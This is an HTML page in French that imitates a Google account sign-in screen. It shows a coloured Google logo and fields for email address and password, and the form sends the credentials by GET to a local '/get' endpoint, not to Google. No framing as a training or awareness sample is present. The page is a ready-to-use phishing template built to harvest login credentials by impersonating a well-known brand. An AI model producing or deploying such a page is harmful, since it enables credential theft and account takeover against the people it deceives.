<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <title>Connexion: comptes Google</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f2f2f2;
      margin: 0;
      padding: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .login-container {
      background-color: #fff;
      border-radius: 8px;
      box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.1);
      padding: 40px;
      text-align: center;
      width: 350px;
    }
    .google-text {
      font-size: 48px;
      font-family: 'Product Sans', Arial, sans-serif;
      font-weight: 700;
      color: #4285f4;
      letter-spacing: 2px;
      margin-bottom: 30px;
    }
    .login-container h2 {
      margin-bottom: 20px;
      color: #333;
    }
    .login-container input[type="text"],
    .login-container input[type="password"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 20px;
      border-radius: 5px;
      border: 1px solid #ccc;
      box-sizing: border-box;
      font-size: 16px;
    }
    .login-container button[type="submit"] {
      width: 100%;
      padding: 12px;
      border-radius: 5px;
      border: none;
      background-color: #4285f4;
      color: #fff;
      cursor: pointer;
      transition: background-color 0.3s ease;
      font-size: 16px;
      font-weight: 500;
      box-shadow: 0px 2px 4px rgba(0, 0, 0, 0.2);
    }
    .login-container button[type="submit"]:hover {
      background-color: #357ae8;
    }
    .forgot-password {
      color: blue;
      font-size: 12px;
    }
    .additional-info {
      font-size: 12px;
      color: #666;
    }
  </style>
</head>
<body>
  <div class="login-container">
    <div class="google-text">G<span style="color: #ea4335;">o</span><span style="color: #fbbc05;">o</span><span style="color: #4285f4;">g</span><span style="color: #34a853;">l</span><span style="color: #ea4335;">e</span></div>
    <h2>Connexion:</h2>
    <form action="/get" id="email-form-step">
      <input name="email" type="text" placeholder="Adresse e-mail" required><br>
      <input name="password" type="password" placeholder="Mot de passe" required><br>
      <p class="additional-info">S'il ne s'agit pas de votre ordinateur, utilisez le mode Invité pour vous connecter en mode privé. <a href="#" style="color: #666;">En savoir plus</a></p>
      <button type="submit">Se connecter</button>
    </form>
    <p class="forgot-password">Adresse mail oubliée ?</p>
  </div>
</body>
</html>
